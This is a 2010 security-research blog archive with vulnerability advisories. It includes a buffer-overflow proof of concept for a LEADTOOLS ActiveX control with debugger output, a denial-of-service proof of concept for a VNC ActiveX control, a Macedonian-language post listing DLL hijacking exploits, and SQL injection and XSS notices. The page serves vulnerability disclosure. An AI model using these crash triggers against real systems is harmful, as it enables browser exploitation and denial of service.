Archive for August, 2010

LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.

Tested On: Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

===============================================================

(2c4.2624): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??

==================================================================

Registers:
————————————————–
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC

EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000

ArgDump:
————————————————–
EBP+8    016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12    0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16    00000000
EBP+20    0013EF6C -> BAAD0008
EBP+24    100255BC -> 10014840 -> Asc: @H@H
EBP+28    0013EDB8 -> 00000000

EBP+8    00150000 -> 000000C8
EBP+12    00410039
EBP+16    7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20    00000000
EBP+24    00410041
EBP+28    7C80FF12 -> 9868146A

CompanyName        LEAD Technologies, Inc.
FileDescription        LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion        16,5,0,2
InternalName        LTRTNU
LegalCopyright        © 1991-2009 LEAD Technologies, Inc.
OriginalFileName        LTRTNU.DLL
ProductName        LEADTOOLS® for Win32
ProductVersion        16.5.0.0

Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False

Exception Code: ACCESS_VIOLATION

Disasm: 7C912F4E    MOV [ECX],AX    (ntdll.dll)
Disasm: 7C96C540    CMP BYTE PTR [EBX+7],FF    (ntdll.dll)

Exception Code: BREAKPOINT

Disasm: 7C90120E    INT3    (ntdll.dll)

Seh Chain:
————————————————–
1     7C839AC0     KERNEL32.dll
2     FC2950         VBSCRIPT.dll
3     7C90E900     ntdll.dll

7C912F4E    MOV [ECX],AX            <— CRASH
7C96C540    CMP BYTE PTR [EBX+7],FF        <— CRASH
7C90120F    RETN                <— CRASH

==================================================================

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

24.08.2010

Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php

PoC:

<object classid=’clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F’ id=’target’ />
<script language=’vbscript’>

targetFile = “C:\Program Files\RFGen40\LtocxTwainu.dll”
prototype  = “Property Let AppName As String”
memberName = “AppName”
progid     = “LTRASTERTWAINLib_U.LEADRasterTwain_U”
argCount   = 1

arg1=String(9236, “A”)

target.AppName = arg1

</script>

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960_pvt.php

Time is on my side

Inspiration: sm, sm@zeroscience.mk
Photography: Ivan Jovanovic aka teppei, iki@zeroscience.mk
Camera Owner: Damjan Arsovski aka Sputnik, damjan@zeroscience.mk
B/W & Finesses: Gjoko Krstic aka LiquidWorm, gjoko@zeroscience.mk

Ref: http://liquidworm.deviantart.com/art/Time-is-on-my-side-by-teppei-176951584

Multiple Vendors DLL Hijacking Exploits

Токму така :)

H D Moore (Metasploit Project) по изјавувањето дека пронашол 40-тина ранливости во Microsoft производи, на 22-ри август го објави и приборот за ревизија на DLL библиотеките и нивно “киднапирање” или hijacking. Се работи за DLLHijackAuditKit v2 со кој извршувате проверка за сите екстензии регистрирани во вашиот систем и нивни соодветни библиотеки, како и нивна експлоатација. Приборот се користи едноставно, ревизијата трае од 15-30 минути и потоа се креираат експлоатациски кодови во фолдер Exploits кои можете да ги користите за било какви цели :)

Повеќе: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html и http://blog.metasploit.com/2010/08/better-faster-stronger.html.

Се разбира, тимот на Zero Science Lab за да не остане покус, изврши ревизија и на еден од своите лабораториските системи и пронајде доста ранливости кои следуваат…

- Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

- Adobe Extension Manager CS5 v5.0.298 (dwmapi.dll) DLL Hijacking Exploit

- Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

- CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

- Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

- Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit

- Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

- Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit

Откако беше објавен DLL Hijack Audit Kit v2 приборот, во светот се објавија повеќе од 100-тина експлоити во рок од неколку дена, поради кое, Microsoft реагираше веднаш со објавување на алатка која ги заобиколуваше овие слабости.

Извор: http://www.computerworld.com/s/article/9181518/Microsoft_releases_tool_to_block_DLL_load_hijacking_attacks?taxonomyId=17&pageNumber=1

Алатката можете да ја преземете на следниов линк: http://support.microsoft.com/kb/2264107 (услов: валиден оперативен систем)

Вакви експлоити сеуште се објавуваат додека го читате текстов и е застрашувачки. Внимавајте од кого преземате податоци и бидете безбедни.

Досега, најбрзо објавување на ваквите експлоити можете да ги пратите на Exploit-DB: http://www.exploit-db.com/local/

Zero Science Lab

Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability

Vendor: Athlete Web Services, Inc. / AWS Sports
Product Web Page: http://www.athletewebservices.com

Summary: Content Management System (PHP+MySQL).

Description: The CMS is vulnerable to an SQL Injection attack when input is passed to the “news_id” parameter. The script fails to properly sanitize the input before being returned to the user allowing the attacker to compromise the entire DB system and view sensitive information.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4949.php

SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS Exploit

The vulnerability exist in the CSC_ServerXControl class with all its members. When parsing overly long string while listening for incoming connection the application crashes along with IE, corrupting the memory.

PoC:

<html>
<object classid=’clsid:8818CF4D-2190-49C3-B7EB-B9F2AE198CB1′ id=’zsl’ />
<script language=’vbscript’>

dos=String(18212, “A”)

zsl.Password = dos

</script>
</html>

http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4948.php

Information Gathering With Google (cOcOn International Security Conference)

c0c0n, previously known as Cyber Safe, is an annual event conducted as part of the International Information Security Day. The Information Security Research Association along with Matriux Security Community is organizing a 2 day International Security and Hacking Conference titled c0c0n 2010, as part of Information Security Day 2010. The event is supported by the Kochi City Police. Various technical, non-technical, legal and community events are organized as part of the program. c0c0n 2010 is scheduled on 05, 06 Aug 2010

The number of digital security incidents and cyber crimes are increasing daily on a proportionate rate. The industry is demanding more and more security professionals and controls to curb this never ending threat to information systems.

c0c0n is aimed at providing a platform to discuss, showcase, educate, understand and spread awareness on the latest trends in information, cyber and hi-tech crimes. It also aims to provide a hand-shaking platform for various corporate, government organizations including the various investigation agencies, academia, research organizations and other industry leaders and players for better co-ordination in making the cyber world a better and safe place to be.

Yet another speech by Maximiliano Soler held on 5th and 6th of August, 2010 in Kochi, India. Maxi thru his presentation mentioned in Recoleccion de Informacion con Google (OWASP Argentina) wonderfully describes the various techniques using Google search for gaining sensitive information when conducting penetration tests.

For more details about the c0c0n conference and speakers visit http://www.informationsecurityday.com/c0c0n/, speakers: http://www.informationsecurityday.com/c0c0n/speakers.html

t00t Maxi ;)

Team Johnlong RaidenTunes 2.1.1 Remote Cross-Site Scripting Vulnerability

RaidenTunes 2.1.1 suffers from a Cross-Site Scripting (XSS) vulnerability caused by improper validation of user-supplied input by the music_out.php script thru “p” param. A remote attacker could exploit this vulnerability to execute script in a victim’s Web browser within the security context of the hosting Web site, allowing the attacker to steal the victim’s cookie-based authentication credentials.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4947.php

Vendor: http://forum.raidenftpd.com/showflat.php?Cat=&Board=mp3&Number=51265&page=0&view=collapsed&sb=5&o=0&fpart=